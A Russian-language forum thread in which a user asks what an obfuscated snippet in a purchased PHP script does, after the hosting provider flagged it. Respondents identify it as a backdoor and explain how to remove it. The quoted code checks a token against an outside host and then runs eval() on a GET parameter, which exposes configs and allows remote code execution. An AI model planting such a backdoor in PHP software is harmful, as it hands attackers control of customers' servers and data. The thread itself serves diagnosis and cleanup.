Вредоносный код в php скрипте, как убрать?

Question

[Andrei St]

Хостинг сообщил что в скрипте имеется вредоносное по!

${"GLOBALS"}["zhnlnvpxiov"] = "config";
        ${"GLOBALS"}["rchmyoafpzb"] = "oloki";
        if (!empty($_GET["doConfirmLoki"])) {
            ${"GLOBALS"}["hypqdo"] = "cloki";
            ${"GLOBALS"}["zbgjvvsxd"] = "cloki";
            ${"GLOBALS"}["gjsqnjxdtv"] = "oloki";
            $bqhzcuynfrb = "cloki";
            ${${"GLOBALS"}["hypqdo"]} = $_GET["doConfirmLoki"];
            ${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb});
            if (${${"GLOBALS"}["rchmyoafpzb"]} === ${${"GLOBALS"}["zbgjvvsxd"]}) {
                echo '<pre>';
                print_r(${${"GLOBALS"}["zhnlnvpxiov"]});
                echo '</pre>';
                if (isset($_GET["uloki"])) eval($_GET["uloki"]);
            }
            die;
        }

Что-бы не указывать название стороннего сайта в get я использовал символы xxxxx что-бы это значило?
{VIRUSDIE}Eval.request
{VIRUSDIE}Obfuscated.Globals.Names
могу даже указать кто продает скрипт с данным функционалом! и человек который его продает лицензию данного скрипта говорит следующие:
Я: тобищь нарушив ваши правила вы портите проект вашему клиенту таким образом?
Владелец-скрипта: Каждый случай уникален...

является ли данный код опасным и что он делает? и как бороться с тем кто распространяет данный скрипт еще и платно?

Каждый php файл с данном скрипте имеет следующие: if (!defined("TKM")) die("Access denied!");

Comments

[Владимир]

Почитал и заплакал. Ну зачем так психику травмировать?

Answer 1

[xmoonlight]

Ищите по всем файлам подстроку: ${"GLOBALS"}[" и убирайте всё от неё и до строк:

if (isset($_GET["uloki"])) eval($_GET["uloki"]);
            }
            die;
        }

включительно!

Comments

[Andrei St]

Насчёт функции:
if (!defined("TKM")) die("Access denied!");

в каждом php коде это что значит?

[Дмитрий]

Андрей Степаненко, https://www.php.net/manual/ru/function.defined

[maksam07]

Андрей Степаненко, могу предположить, чтобы не вызвали файл напрямую из строки браузера
В данном случае, опасности в этом коде не вижу, так многие программисты защищают код.

[xmoonlight]

Андрей Степаненко, это проверка флага на запрет прямого вызова. Обычно везде в веб-апликухах так делается.
Это точно оставьте как есть и не удаляйте!

Answer 2

[maksam07]

Если не разбирать код, а просто глянуть на это:
eval($_GET["uloki"])
то можно предположить, что гет запросом в какой-то момент можно вызвать любой скрипт. Довольно опасная вещь
https://www.php.net/manual/ru/function.eval.php

А в чем проблема убрать его? Или этот код предоставил хостинг? Поиск по всем файлам определенного куска текста должно дать какой-то ответ

Comments

[Andrei St]

И еще функция ${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb}); вместо xxxxx ведет на сторонний сайт для чего?

[maksam07]

Андрей Степаненко, назови полностью домен
Автора скрипт, желательно, тоже

[Andrei St]

Максим Компаниец,

${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("https://whileteam.ru/ad-loki.php?loki=" . ${$bqhzcuynfrb});

Думаю здесь без комментариев, просьба огромная, меня не палить автору, анонимно, просто беспокоюсь за тех кто у него купил скрипт и досехпор не подозревают что все данные игровых серверов, конфиги, базы и.тд у него в свободном владении...

Мало того что для скрипта взят готовый rcon который находиться на гите в свободном доступе, так он еще и взял https://github.com/AlexBrin/LiteDonate-PHP-SDK просто и не безопасно добавил функции оплаты для выполнения скрипта после оплаты...

Так еще он и диктует свою политику "Лицензии". https://ldonate.ru/info/license

[maksam07]

Андрей Степаненко, снова же, по предположению, похоже на какую-то рекламную интеграцию. Это в лучшем случае. В худшем - вплоть до доступа к серверу, т.к. eval может выполнять любой php скрипт. Особенно, если у файла, где прописан этот код - есть все разрешения.